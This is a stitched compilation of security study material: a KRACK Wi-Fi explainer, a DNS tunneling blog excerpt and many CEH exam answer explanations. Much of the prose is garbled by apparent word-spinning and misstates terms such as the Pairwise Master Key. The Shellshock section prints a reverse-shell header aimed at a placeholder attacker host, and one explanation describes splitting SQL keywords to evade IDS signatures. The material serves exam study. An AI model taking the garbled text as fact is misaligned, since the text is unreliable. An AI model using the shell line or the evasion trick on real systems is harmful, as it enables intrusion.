How KRACK Works

Your Wi-Fi client uses a four-way handshake when attempting to attach to a protected network. The handshake confirms that both the client — your smartphone, laptop, et cetera — and therefore the access point share the right credentials, usually a password for the network. This establishes the Pairwise passkey (PMK), which allows for encoding .

Overall, this handshake procedure allows for quick logins and connections and sets up a replacement encryption key with each connection. this is often what keeps data secure on Wi-Fi connections, and every one protected Wi-Fi connections use the four-way handshake for security. This protocol is that the reason users are encouraged to use private or credential-protected Wi-Fi instead of public connections.

KRACK affects the third step of the handshake, allowing the attacker to control and replay the WPA2 encryption key to trick it into installing a key already in use. When the key’s reinstalled, other parameters related to it — the incremental transmit packet number called the nonce and therefore the replay counter — are set to their original values.

Rather than move to the fourth step within the four-way handshake, nonce resets still replay transmissions of the third step. This sets up the encryption protocol for attack, and counting on how the attackers replay the third-step transmissions, they will take down Wi-Fi security.

Why KRACK may be a Threat

Think of all the devices you employ that believe Wi-Fi. it isn’t almost laptops and smartphones; numerous smart devices now structure the web of Things (IoT). due to the vulnerability in WPA2, everything connected to Wi-Fi is in danger of being hacked or hijacked.

Attackers using KRACK can gain access to usernames and passwords also as data stored on devices. Hackers can read emails and consider photos of transmitted data then use that information to blackmail users or sell it on the Dark Web.

Theft of stored data requires more steps, like an HTTP content injection to load malware into the system. Hackers could conceivably take hold of any device used thereon Wi-Fi connection. Because the attacks require hackers to be on the brink of the target, these internet security threats could also cause physical security threats.

On the opposite hand, the necessity to be in close proximity is that the only excellent news associated with KRACK, as meaning a widespread attack would be extremely difficult.

Victims are specifically targeted. However, there are concerns that a experienced attacker could develop the talents to use HTTP content injection to load malware onto websites to make a more widespread affect.

Everyone is in danger from KRACK vulnerability. Patches are available for Windows and iOS devices, but a released patch for Android devices is currently in question (November 2017). There are issues with the discharge , and lots of question if all versions and devices are covered.

The real problem is with routers and IoT devices. These devices aren’t updated as regularly as computer operating systems, and for several devices, security flaws got to be addressed on the manufacturing side. New devices should address KRACK, but the devices you have already got in your home probably aren’t protected.

The best protection against KRACK is to make sure any device connected to Wi-Fi is patched and updated with the newest firmware. that has checking together with your router’s manufacturer periodically to ascertain if patches are available.

The safest connection option may be a private VPN, especially when publicly spaces. If you would like a VPN for private use, avoid free options, as they need their own security problems and there’ll even be issues with HTTPs. Use a paid service offered by a trusted vendor like Kaspersky. Also, more modern networks use WPA3 for better security.

Avoid using public Wi-Fi, albeit it’s password protection. That password is out there to almost anyone, which reduces the safety level considerably.

All the widespread implications of KRACK and therefore the WPA2 vulnerability aren’t yet clear. what’s certain is that everybody who uses Wi-Fi is in danger and wishes to require precautions to guard their data and devices.

TCP port 21 is used by the File Transfer Protocol (FTP), which is an unencrypted protocol. To detect if unencrypted file transfers are taking place, you can apply the Wireshark display filter:

tcp.port == 21

This will show all traffic to and from FTP servers. Since FTP transmits usernames, passwords, and data in clear text, its use would violate the company’s policy.

CEH v13 states:

“FTP (Port 21) is a cleartext protocol vulnerable to sniffing. To enforce secure communication, companies often transition to SFTP (over SSH, port 22) or FTPS (FTP over TLS/SSL).”

Incorrect Options:

B. Port 23 is used for Telnet, not FTP.

C. Combining FTP (21) and SSH/SFTP (22) would include encrypted traffic, which is not what you're trying to isolate.

D. tcp.port != 21 filters out FTP traffic, which is the opposite of the intended goal.

Reference – CEH v13 Guide:

Module 01: Introduction to Ethical Hacking

Subsection: Sniffing and Cleartext Protocols

Wireshark iLab: Identifying FTP Traffic

=

IoTSeeker is a specialized tool used to identify Internet of Things (IoT) devices that are accessible over a network and are still configured with their default factory credentials. These devices often ship with insecure settings, which attackers can exploit.

From CEH v13 Official Courseware:

IoTSeeker:

Automatically scans for common IoT devices

Uses a database of known default usernames and passwords

Flags insecure devices for further investigation or exploitation

The tool is commonly used in the reconnaissance phase for identifying low-hanging vulnerabilities in IoT environments.

Incorrect options:

B. IoT Inspector monitors network traffic for smart devices but is more focused on behavior monitoring than credential scanning.

C. AT&T IoT Platform and D. Azure IoT Central are legitimate enterprise platforms for IoT device management and are not penetration testing tools.

Reference – CEH v13 Official Courseware:

Module 18: IoT and OT Hacking

Section: “IoT Attack Surface”

Tool Reference: “IoTSeeker”

Practical Lab: CEH Engage IoT Device Discovery

=

Comprehensive and Detailed Explanation From CEH v13 Guide:

Grey-box testing is a hybrid method where the tester has partial knowledge of the internal workings of the system, allowing for a more focused and efficient assessment of security vulnerabilities compared to black-box (no knowledge) and white-box (full knowledge). This approach simulates an insider threat or a user with limited access rights.

CEH v13 Reference:

Module 15: Hacking Web Applications – Types of Penetration Testing

“Gray-box testing assumes partial knowledge of internal structures, combining elements of both black-box and white-box testing.”

=

Currently, Emotet uses five known spreader modules: NetPass.exe, WebBrowserPassView, Mail PassView, Outlook scraper, and a credential enumerator. Credential enumerator is a self-extracting RAR file containing two components: a bypass component and a service component. The bypass component is used for the enumeration of network resources and either finds writable share drives using Server Message Block (SMB) or tries to brute force user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients).

*REST is not a specification, tool, or framework, but instead is an architectural style for web services that serves as a communication medium between various systems on the web. *RESTful APIs, which are also known as RESTful services, are designed using REST principles and HTTP communication protocols RESTful is a collection of resources that use HTTP methods such as PUT, POST, GET, and DELETE

RESTful API: RESTful API is a RESTful service that is designed using REST principles and HTTP communication protocols. RESTful is a collection of resources that use HTTP methods such as PUT, POST, GET, and DELETE. RESTful API is also designed to make applications independent to improve the overall performance, visibility, scalability, reliability, and portability of an application. APIs with the following features can be referred to as to RESTful APIs: o Stateless: The client end stores the state of the session; the server is restricted to save data during the request processing o Cacheable: The client should save responses (representations) in the cache. This feature can enhance API performance pg. 1920 CEHv11 manual.

The HTTP methods GET, POST, PUT or PATCH, and DELETE can be used with these templates to read, create, update, and delete description resources for dogs and their owners. This API style has become popular for many reasons. It is straightforward and intuitive, and learning this pattern is similar to learning a programming language API. APIs like this one are commonly called RESTful APIs, although they do not display all of the characteristics that define REST (more on REST later).

This scenario demonstrates a classic social engineering tactic often referred to as “social media quizzes” or “engagement bait”, commonly used in open-source intelligence gathering (OSINT) and pretexting attacks.

From CEH v13 Module 01: Introduction to Ethical Hacking and Module 09: Social Engineering, attackers may create seemingly innocent posts that ask users to share answers to common questions like:

What was your first pet’s name?

What’s your mother’s maiden name?

What city were you born in?

What’s your favorite food?

These questions mirror the types of security questions used by banks and other services for account recovery or authentication. By answering these in public forums or comments, users unknowingly disclose data that can be used to:

Bypass security questions

Reset passwords

Perform targeted account takeovers

Why Other Options Are Incorrect:

B. Matt's bank account login information was brute forced.

Unlikely. Most banks implement account lockout policies and multi-factor authentication that would prevent brute force attempts.

C. Matt inadvertently provided his password when responding to the post.

Incorrect. Passwords are not usually asked in public-facing posts. Users are unlikely to provide literal passwords unless heavily tricked by phishing.

D. Matt's computer was infected with a keylogger.

Possible but less likely. The context suggests that the only suspicious behavior was responding to the Facebook post, which doesn't imply malware installation or downloading.

Reference from CEH v13 Study Guide and Course Material:

CEH v13 Official Module 09 – Social Engineering, Slide: Common Social Engineering Techniques (Quizzes, Pretexting)

CEH Engage – Social Engineering Phase

EC-Council iLabs – Performing Social Engineering Attacks Simulation

CEH v13 Courseware Notes – Reconnaissance Using OSINT and Public Social Platforms

This scenario aligns with a Replay Attack against RF-based smart key systems, covered in CEH v13 IoT and OT Hacking. Attackers capture radio-frequency signals transmitted by key fobs and replay them to unlock vehicles.

CEH v13 emphasizes that detecting and preventing such attacks requires monitoring wireless RF signals for anomalies such as signal replay, interference, or jamming patterns. RF analysis helps confirm unauthorized signal capture and retransmission.

Firmware updates may mitigate future vulnerabilities, but confirmation requires RF monitoring. Physical surveillance and smartphone malware controls are unrelated to RF replay attacks. Therefore, option D is correct.

A cryptographic hash function is used to ensure data integrity. It generates a fixed-length output (digest) from any size of input data. If the data is modified in any way, the resulting hash will change. This allows systems to detect data tampering, ensuring that the data remains unaltered from its original form.

Reference – CEH v13 Official Study Guide:

Module 20: Cryptography

Quote:

“Hash functions are used to ensure the integrity of a message or file by producing a unique digest that changes if the data is modified.”

Incorrect Options:

A. Authentication ensures identity, not data integrity.

B. Confidentiality is achieved via encryption, not hashing.

C. Availability pertains to system uptime and accessibility, not hashes.

=

CEH v13 explains that reflected XSS occurs when malicious input supplied by an attacker is immediately returned in the HTTP response without sanitization. This type of XSS is typically exploited through a crafted URL containing embedded JavaScript payloads. When a victim clicks the link, the vulnerable server reflects the injected script back to the browser, executing it within the user’s session context. CEH emphasizes that reflected XSS relies on social engineering to deliver the payload, often via links sent through email, messaging platforms, or compromised pages. The goal may include stealing session cookies, redirecting users, or manipulating page content. Brute-forcing credentials (Option A) has no relation to XSS. SQL injection (Option C) targets backend databases, not client-side script execution. Directory traversal (Option D) concerns file path manipulation, not dynamic script injection. Therefore, embedding a malicious script in a URL is the correct method to exploit reflected XSS.

A rootkit is a type of stealth malware designed to hide the existence of certain processes or programs from normal detection methods. It can:

Hide itself and other processes

Conceal files and registry entries

Intercept system calls or keystrokes (keylogging)

Maintain persistent access

From CEH v13 Courseware:

Module 6: Malware Threats → Rootkits

Incorrect Options:

A: A Trojan may offer remote access but doesn't necessarily hide itself.

C: DoS tools are used to overload systems, not hide.

D: Scanners detect vulnerabilities, not conceal activities.

E: A backdoor may provide unauthorized access, but rootkits focus on hiding.

In CEH v13 Module 12: Hacking Web Applications, SOAP (Simple Object Access Protocol) is discussed as a protocol that allows web service communication using XML-based messages.

Correct SOAP Characteristics:

Structured model for data exchange, used in SOAP envelopes.

Built on XML format.

Can operate over multiple application layer protocols, not just HTTP (e.g., SMTP, FTP, JMS).

Option B is incorrect because:

While SOAP most commonly uses HTTP, it is not limited to it. SOAP is protocol-independent at the transport layer.

User-directed spidering is a technique that allows the hacker to manually browse the target website and use a proxy or spider tool to capture and analyze the traffic. This way, the hacker can discover hidden or dynamic content that standard web spiders may miss due to a specific file in the root directory, such as robots.txt, that instructs them not to crawl certain pages or directories. User-directed spidering can also help the hacker to bypass authentication or authorization mechanisms, as well as identify vulnerabilities or sensitive information in the target website. User-directed spidering can be performed with tools like Burp Suite and WebScarab, which are web application security testing tools that can intercept, modify, and replay HTTP requests and responses, as well as perform various attacks and scans on the target website.

The other options are not likely to achieve the same results as user-directed spidering. Using Photon to retrieve archived URLs of the target website from archive.org may provide some historical information about the website, but it may not reflect the current state or content of the website. Using the Netcraft tool to gather website information may provide some general information about the website, such as its IP address, domain name, server software, or hosting provider, but it may not reveal the specific files or web pages on the website. Examining HTML source code and cookies may provide some clues about the website’s structure, functionality, or user preferences, but it may not expose the hidden or dynamic content that user-directed spidering can discover. References:

User Directed Spidering with Burp

Web Spidering - What Are Web Crawlers & How to Control Them

Web Security: Recon

Mapping the Application for Penetrating Web Applications — 1

The Certified Ethical Hacker (CEH) Web Application Security module emphasizes that client-side controls cannot be trusted.

Disabling JavaScript allows attackers to bypass:

Password complexity enforcement

CAPTCHA validation

Input validation logic

Option B is the simplest and most effective CEH-approved method.

Option A is unnecessary and noisy.

Option C risks detection.

Option D is effective but more complex and detectable.

CEH explicitly teaches testers to disable JavaScript to evaluate server-side enforcement.

Trident is a highly sophisticated spyware tool used in mobile surveillance operations. It exploits multiple zero-day vulnerabilities to jailbreak iPhones remotely and grant full control to the attacker. It is famously associated with the Pegasus spyware, which was able to:

Record calls and ambient sound

Capture screenshots

Read SMS, emails, and contacts

Monitor GPS and application use

As per CEH v13:

Trident uses a chain of exploits to compromise iOS devices without physical access.

It was used in highly targeted attacks against journalists, activists, and government officials.

Incorrect Options:

A. DroidSheep is an Android tool for session hijacking on unsecured Wi-Fi.

B. Androrat is a RAT for Android devices.

C. Zscaler is a cloud security platform, not malware.

Reference – CEH v13 Official Courseware:

Module 17: Hacking Mobile Platforms

Section: “iOS Malware”

Subsection: “Spyware like Trident and Pegasus”

=

According to the CEH System Hacking and Web Application Security modules, Man-in-the-Browser (MitB) attacks are among the most sophisticated and difficult session-hijacking techniques to detect. In MitB attacks, malware operates inside the victim’s browser, allowing attackers to intercept, modify, or inject transactions after authentication has occurred.

CEH documentation highlights that MitB attacks bypass:

Multi-factor authentication

Encrypted cookies

HTTPS/TLS protections

Because the malicious activity occurs at the browser level, security controls perceive transactions as legitimate.

Option B is correct.

Option A (XSS) is detectable via content security policies.

Option C is mitigated by regenerating session IDs.

Option D is ineffective against encrypted sessions.

CEH emphasizes MitB attacks as a critical threat to online banking systems.

In an inference-based assessment, scanning starts by building an inventory of the protocols found on the machine. After finding a protocol, the scanning process starts to detect which ports are attached to services, such as an email server, web server, or database server. After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.

The best practice to meet the client’s requirement is to encrypt data client-side before uploading to the cloud and retain control of the encryption keys. This practice is also known as client-side encryption or end-to-end encryption, and it involves encrypting the data on the client’s device using a software or hardware tool that generates and manages the encryption keys. The encrypted data is then uploaded to the cloud service, where it remains encrypted at rest. The encryption keys are never shared with the cloud service provider or any third party, and they are only used by the client to decrypt the data when needed. This way, the client can maintain full control over the encryption keys and the security of the data, even when the data is stored on a public cloud service12.

The other options are not as optimal as option D for the following reasons:

A. Use the cloud service provider’s encryption services but store keys on-premises: This option is not feasible because it contradicts the client’s requirement of maintaining full control over the encryption keys. Using the cloud service provider’s encryption services means that the client has to rely on the cloud service provider to generate and manage the encryption keys, even if the keys are stored on-premises. The cloud service provider may have access to the keys or the ability to decrypt the data, which may compromise the security and privacy of the data. Moreover, storing the keys on-premises may introduce additional challenges, such as key distribution, synchronization, backup, and recovery3.

B. Use the cloud service provider’s default encryption and key management services: This option is not desirable because it violates the client’s requirement of maintaining full control over the encryption keys. Using the cloud service provider’s default encryption and key management services means that the client has to trust the cloud service provider to encrypt and decrypt the data on the server-side, using the cloud service provider’s own encryption keys and mechanisms. The cloud service provider may have access to the keys or the ability to decrypt the data, which may compromise the security and privacy of the data. Furthermore, the cloud service provider’s default encryption and key management services may not meet the regulatory requirements or the security standards of the client4.

C. Rely on Secure Sockets Layer (SSL) encryption for data at rest: This option is not sufficient because SSL encryption is not designed for data at rest, but for data in transit. SSL encryption is a protocol that encrypts the data as it travels over the internet between the client and the server, using certificates and keys that are exchanged and verified by both parties. SSL encryption can protect the data from being intercepted or modified by unauthorized parties, but it does not protect the data from being accessed or decrypted by the cloud service provider or any third party who has access to the server. Moreover, SSL encryption does not provide the client with any control over the encryption keys or the security of the data.

The Common Vulnerability Scoring System (CVSS) is a method used to supply a qualitative measure of severity for a vulnerability. CVSS consists of three metric groups: Base, Temporal, and Environmental. The Base metrics produce a score ranging from 0 to 10, which can then be modified by scoring the Temporal and Environmental metrics. A vector string represents the values of all the metrics as a block of text1

The Base metrics measure the intrinsic characteristics of a vulnerability, such as the attack vector, the attack complexity, the required privileges, the user interaction, the scope, and the impact on confidentiality, integrity, and availability. The Base score reflects the severity of a vulnerability assuming that there is no temporal information or context available1

The Temporal metrics measure the characteristics of a vulnerability that change over time, such as the exploit code maturity, the remediation level, and the report confidence. The Temporal score reflects the current state of a vulnerability and its likelihood of being exploited1

The Environmental metrics measure the characteristics of a vulnerability that depend on a specific implementation or environment, such as the security requirements, the modified base metrics, and the collateral damage potential. The Environmental score reflects the impact of a vulnerability on a particular organization or system1

In this scenario, the vulnerability has a Base score of 7, a Temporal score of 8, and an Environmental score of 5. This means that:

The vulnerability has a high severity based on its intrinsic characteristics, such as the attack vector, the attack complexity, the required privileges, the user interaction, the scope, and the impact on confidentiality, integrity, and availability. A Base score of 7 corresponds to a high severity rating according to the CVSS v3.0 specification1

The vulnerability has an increasing likelihood of exploitability over time based on its current state, such as the exploit code maturity, the remediation level, and the report confidence. A Temporal score of 8 is higher than the Base score of 7, which indicates that the vulnerability is more likely to be exploited as time passes1

The vulnerability has a medium impact on the specific environment or implementation based on the security requirements, the modified base metrics, and the collateral damage potential. An Environmental score of 5 is lower than the Base score of 7, which indicates that the vulnerability is less impactful in the particular context of the organization or system1

Therefore, the statement that best describes this scenario is: The vulnerability has an overall high severity, the likelihood of exploitability is increasing over time, and it has a medium impact in their specific environment.

This technique is known as Boolean-Based Blind SQL Injection, as defined in CEH v13 Web Application Hacking. When applications suppress database errors and return generic responses, attackers use conditional statements to infer database behavior.

By comparing responses to true (1=1) and false (1=2) conditions, the attacker deduces whether injected SQL is being executed successfully.

CEH v13 distinguishes this from:

Error-based SQLi (visible DB errors)

UNION-based SQLi (data extraction)

Time-based SQLi (response delays)

Boolean-based blind SQL injection relies solely on content differences, making option C correct.

Time-based blind SQL injection is used when applications suppress error messages and do not display query results. According to CEH v13, attackers rely on response time delays to infer whether injected SQL statements are executed.

The BENCHMARK() function forces the database to perform a CPU-intensive operation repeatedly, causing a noticeable delay if the injected condition is executed successfully. Option D explicitly introduces such a delay and is a textbook time-based blind SQL injection payload.

Options A, B, and C are used for union-based or boolean-based SQL injection and rely on visible output or content changes, which are ineffective in blind scenarios.

CEH v13 clearly states that time-delay functions such as SLEEP(), WAITFOR DELAY, and BENCHMARK() are the primary indicators for time-based blind SQL injection testing. Hence, Option D is correct.

CEH v13 highlights that SNMPv1/v2 environments configured with default community strings such as "public" or "private" present significant security risks because they allow unauthorized users to query system information. SNMP enumeration can reveal processes, interfaces, routing tables, users, device configurations, and more. The snmp-processes Nmap NSE script is specifically designed to enumerate running processes on an SNMP-enabled host. It queries the Host Resources MIB (HR-MIB), which stores operational information about system processes, CPU usage, and memory consumption. This information provides attackers with insights into what services may be exploitable or misconfigured. CEH stresses that SNMPv2 is particularly vulnerable due to lack of encryption and authentication hardening. By enumerating processes, penetration testers can identify potential privilege escalation paths, outdated services, or rogue applications that may aid lateral movement. Other scripts such as snmp-sysdescr or snmp-interfaces retrieve system description or interface data but do not enumerate processes.

In ethical hacking and penetration testing, assessing the security posture of a target system requires direct technical interaction with that system. The combination of techniques in option D—port scanning, banner grabbing, and service identification—provides actionable and detailed insight into the system’s vulnerabilities, services, and configurations.

According to CEH v13 Official Courseware:

Port scanning is the process of identifying open ports and the services running on them. It reveals:

Which ports are open or closed

The operating system's response behavior

Entry points for possible exploitation

Banner grabbing involves connecting to open services to retrieve application-level information. This can expose:

Software version numbers

Server type and configuration

Security misconfigurations

Service identification allows the security professional to determine what protocols and services (HTTP, FTP, SSH, etc.) are active and how they are configured. This supports:

Vulnerability analysis

Risk evaluation

Threat modeling

These combined techniques are fundamental steps in the reconnaissance and scanning phases of the ethical hacking lifecycle.

Incorrect Options:

A. Phishing, spamming, sending trojans are offensive tactics used in attacks; they provide limited direct system analysis and do not measure technical posture directly.

B. Social engineering, site browsing, and tailgating are physical or psychological attack vectors, not direct technical assessments.

C. Wardriving and warchalking identify wireless networks but offer limited detail about internal system configurations or vulnerabilities.

Reference – CEH v13 Official Study Material:

Module 03: Scanning Networks

Section: “Types of Scanning”

Subsections: “Port Scanning,” “Banner Grabbing,” and “Service Version Detection”

CEH Engage: Scanning and Enumeration labs

CEH Official Exam Blueprint: Knowledge Area — “Footprinting and Reconnaissance” and “Scanning Networks”

These techniques are emphasized as foundational components in any network vulnerability assessment.

Employing a tool like Sublist3r, which is designed to enumerate the subdomains of websites using OSINT, would be the most effective method to accomplish this goal. This option works as follows:

Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT (Open Source Intelligence). It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS. Subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist1.

By using Sublist3r, the tester can quickly and efficiently discover the subdomains of the target organization’s website, which can provide valuable information about the network structure, the services offered, the potential vulnerabilities, and the attack surface. Sublist3r can also be used to perform passive reconnaissance, which does not send any packets to the target domain, and thus avoids detection by the target organization12.

The other options are not as effective as option A for the following reasons:

B. Analyzing Linkedin profiles to find employees of the target company and their job titles: This option is not relevant because it does not address the subdomain enumeration task, but the social engineering task. Linkedin is a social networking platform that allows users to create and share their professional profiles, which may include their name, job title, company, skills, education, and contacts. By analyzing Linkedin profiles, the tester may be able to find employees of the target company and their job titles, which can be useful for crafting phishing emails, impersonating employees, or exploiting human weaknesses. However, this option does not help to discover the subdomains of the target organization’s website, which is the goal of this scenario3.

C. Utilizing the Harvester tool to extract email addresses related to the target domain using a search engine like Google or Bing: This option is not sufficient because it does not provide a comprehensive list of subdomains, but only a partial list based on email addresses. The Harvester is a tool that can extract email addresses, subdomains, hosts, employee names, open ports, and banners from different public sources, such as search engines, PGP key servers, and SHODAN computer database. By using the Harvester, the tester may be able to extract some email addresses related to the target domain, which can reveal some subdomains, such as mail.target.com or support.target.com. However, this option does not guarantee to find all the subdomains of the target organization’s website, as some subdomains may not have any email addresses associated with them, or may not be indexed by the search engines4.

D. Using a people search service, such as Spokeo or Intelius, to gather information about the employees of the target organization: This option is not applicable because it does not address the subdomain enumeration task, but the personal information gathering task. Spokeo and Intelius are people search services that can provide various information about individuals, such as their name, address, phone number, email, social media, criminal records, and financial history. By using these services, the tester may be able to gather information about the employees of the target organization, which can be useful for performing background checks, identity theft, or blackmail. However, this option does not help to discover the subdomains of the target organization’s website, which is the goal of this scenario56.

WEP encryption is an outdated and insecure method of protecting wireless networks from unauthorized access and eavesdropping. WEP uses a static key that can be easily cracked by various tools and techniques, such as capturing the initialization vectors, brute-forcing the key, or exploiting the weak key scheduling algorithm1. Therefore, you should recommend a more secure encryption method to enhance the security of the company’s wireless network.

One of the most suitable replacements for WEP encryption is WPA2-PSK with AES encryption. WPA2 stands for Wi-Fi Protected Access 2, which is a security standard that improves upon the previous WPA standard. WPA2 uses a robust encryption algorithm called AES, which stands for Advanced Encryption Standard. AES is a block cipher that uses a 128-bit key and is considered to be very secure and resistant to attacks2.

WPA2-PSK stands for WPA2 Pre-Shared Key, which is a mode of WPA2 that uses a passphrase or a password to generate the encryption key. The passphrase or password must be entered by the users who want to connect to the wireless network. The key is then derived from the passphrase or password using a function called PBKDF2, which stands for Password-Based Key Derivation Function 2. PBKDF2 adds a salt and a number of iterations to the passphrase or password to make it harder to crack3.

WPA2-PSK with AES encryption offers several advantages over WEP encryption, such as:

It uses a dynamic key that changes with each session, instead of a static key that remains the same.

It uses a stronger encryption algorithm that is more difficult to break, instead of a weaker encryption algorithm that is more vulnerable to attacks.

It uses a longer key that provides more security, instead of a shorter key that provides less security.

It uses a more secure key derivation function that adds complexity and randomness, instead of a simple key generation function that is predictable and flawed.

Therefore, you should recommend WPA2-PSK with AES encryption as a suitable replacement to enhance the security of the company’s wireless network.

A pharming attacker tries to send a web site’s traffic to a faux website controlled by the offender, typically for the aim of collection sensitive data from victims or putting in malware on their machines. Attacker tend to specialize in making look-alike ecommerce and digital banking websites to reap credentials and payment card data.

Though they share similar goals, pharming uses a special technique from phishing. “Pharming attacker are targeted on manipulating a system, instead of tricking people into reaching to a dangerous web site,” explains David Emm, principal security man of science at Kaspersky. “When either a phishing or pharming attacker is completed by a criminal, they need a similar driving issue to induce victims onto a corrupt location, however the mechanisms during which this is often undertaken are completely different.”

18 U.S.C. §1030, also known as the Computer Fraud and Abuse Act (CFAA), is a broad federal statute that criminalizes unauthorized access to computers and related fraudulent activities—including phishing and email scams.

From CEH v13 Official Courseware:

Module 1: Introduction to Ethical Hacking

Topic: U.S. Laws Related to Cybercrime

CEH v13 Study Guide states:

“Email-based frauds such as phishing, spoofing, and other social engineering attacks fall under the Computer Fraud and Abuse Act (18 U.S.C. §1030), which criminalizes unauthorized access and fraudulent behavior in computing systems.”

Incorrect Options:

B: Relates to credit cards and access devices.

C: Covers interference with government communication systems.

D: Covers illegal wiretapping and eavesdropping.

A Network-based Intrusion Detection System (NIDS) monitors all network traffic for signs of suspicious activity across multiple hosts. In large environments with critical assets (e.g., financial or healthcare networks), NIDS is ideal because it provides visibility into entire network segments, not just individual systems.

NIDS can be deployed at strategic points (e.g., DMZs, VLANs, subnets) to detect unauthorized access, malware activity, or policy violations.

Reference – CEH v13 Official Courseware:

Module 13: Evading IDS, Firewalls, and Honeypots

Quote:

“Network-based IDS monitors traffic across an entire subnet or segment and is most effective in large environments to detect malicious activity before it reaches critical assets.”

Incorrect Options Explained:

A. Honeypots attract and log attacker behavior, but do not provide network-wide detection.

B. Firewalls filter traffic but are not detection systems.

D. HIDS monitors activity on a single host only.

=

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

CSRF is an attack that tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on the victim’s behalf. For most sites, browser requests automatically include any credentials associated with the site, such as the user’s session cookie, IP address, Windows domain credentials, and so forth. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish between the forged request sent by the victim and a legitimate request sent by the victim.

CSRF attacks target functionality that causes a state change on the server, such as changing the victim’s email address or password, or purchasing something. Forcing the victim to retrieve data doesn’t benefit an attacker because the attacker doesn’t receive the response, the victim does. As such, CSRF attacks target state-changing requests.

It’s sometimes possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called “stored CSRF flaws”. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already.

DNS tunneling may be a method wont to send data over the DNS protocol, a protocol which has never been intended for data transfer. due to that, people tend to overlook it and it’s become a well-liked but effective tool in many attacks.

Most popular use case for DNS tunneling is obtaining free internet through bypassing captive portals at airports, hotels, or if you are feeling patient the not-so-cheap on the wing Wi-Fi.

On those shared internet hotspots HTTP traffic is blocked until a username/password is provided, however DNS traffic is usually still allowed within the background: we will encode our HTTP traffic over DNS and voilà, we’ve internet access.

This sounds fun but reality is, browsing anything on DNS tunneling is slow. Like, back to 1998 slow.

Another more dangerous use of DNS tunneling would be bypassing network security devices (Firewalls, DLP appliances…) to line up an immediate and unmonitored communications channel on an organisation’s network. Possibilities here are endless: Data exfiltration, fixing another penetration testing tool… you name it.

To make it even more worrying, there’s an outsized amount of easy to use DNS tunneling tools out there.

There’s even a minimum of one VPN over DNS protocol provider (warning: the planning of the web site is hideous, making me doubt on the legitimacy of it).

As a pentester all this is often great, as a network admin not such a lot .

How does it work:

For those that ignoramus about DNS protocol but still made it here, i feel you deserve a really brief explanation on what DNS does: DNS is sort of a phonebook for the web , it translates URLs (human-friendly language, the person’s name), into an IP address (machine-friendly language, the phone number). That helps us remember many websites, same as we will remember many people’s names.

For those that know what DNS is i might suggest looking here for a fast refresh on DNS protocol, but briefly what you would like to understand is:

• A Record: Maps a website name to an IP address.

example.com ? 12.34.52.67

• NS Record (a.k.a. Nameserver record): Maps a website name to an inventory of DNS servers, just in case our website is hosted in multiple servers.

example.com ? server1.example.com, server2.example.com

Who is involved in DNS tunneling?

• Client. Will launch DNS requests with data in them to a website .

• One Domain that we will configure. So DNS servers will redirect its requests to an outlined server of our own.

• Server. this is often the defined nameserver which can ultimately receive the DNS requests.

The 6 Steps in DNS tunneling (simplified):

1. The client encodes data during a DNS request. The way it does this is often by prepending a bit of knowledge within the domain of the request. for instance : mypieceofdata.server1.example.com

2. The DNS request goes bent a DNS server.

3. The DNS server finds out the A register of your domain with the IP address of your server.

4. The request for mypieceofdata.server1.example.com is forwarded to the server.

5. The server processes regardless of the mypieceofdata was alleged to do. Let’s assume it had been an HTTP request.

6. The server replies back over DNS and woop woop, we’ve got signal.

Bypassing Firewalls through the DNS Tunneling Method DNS operates using UDP, and it has a 255-byte limit on outbound queries. Moreover, it allows only alphanumeric characters and hyphens. Such small size constraints on external queries allow DNS to be used as an ideal choice to perform data exfiltration by various malicious entities. Since corrupt or malicious data can be secretly embedded into the DNS protocol packets, even DNSSEC cannot detect the abnormality in DNS tunneling. It is effectively used by malware to bypass the firewall to maintain communication between the victim machine and the C&C server. Tools such as NSTX Heyoka and Iodine use this technique of tunneling traffic across DNS port 53. CEH v11 Module 12 Page 994

In CEH v13 Module 06: Malware Threats, the Shellshock vulnerability (CVE-2014-6271) is described as a severe bug in the Bash shell where specially crafted environment variables could be used to execute arbitrary commands.

The most common attack vector: Web servers using CGI scripts written in Bash.

Attackers send malicious HTTP requests to CGI endpoints where Bash executes commands.

Exploitation looks like:

User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1

The most effective evasion technique to bypass the IDS signature detection while performing a SQL Injection attack is to leverage string concatenation to break identifiable keywords. This technique involves splitting SQL keywords or operators into smaller parts and joining them with string concatenation operators, such as ‘+’ or ‘||’. This way, the SQL query can still be executed by the database engine, but the IDS cannot recognize the keywords or operators as malicious, as they are hidden within strings. For example, the hacker could replace the keyword ‘OR’ with ‘O’||‘R’ or ‘O’+‘R’ in the SQL query, and the IDS would not be able to match the signature of a typical SQL injection pattern12.

The other options are not as effective as option D for the following reasons:

A. Implement case variation by altering the case of SQL statements: This option is not effective because most SQL engines and IDS systems are case-insensitive, meaning that they treat SQL keywords and operators the same regardless of their case. Therefore, altering the case of SQL statements would not help evade the IDS signature detection, as the IDS would still be able to match the signature of a typical SQL injection pattern3.

B. Employ IP fragmentation to obscure the attack payload: This option is not applicable because IP fragmentation is a network-level technique that splits IP packets into smaller fragments to fit the maximum transmission unit (MTU) of the network. IP fragmentation does not affect the content or structure of the SQL query, and it does not help evade the IDS signature detection, as the IDS would still be able to reassemble the fragments and match the signature of a typical SQL injection pattern4.

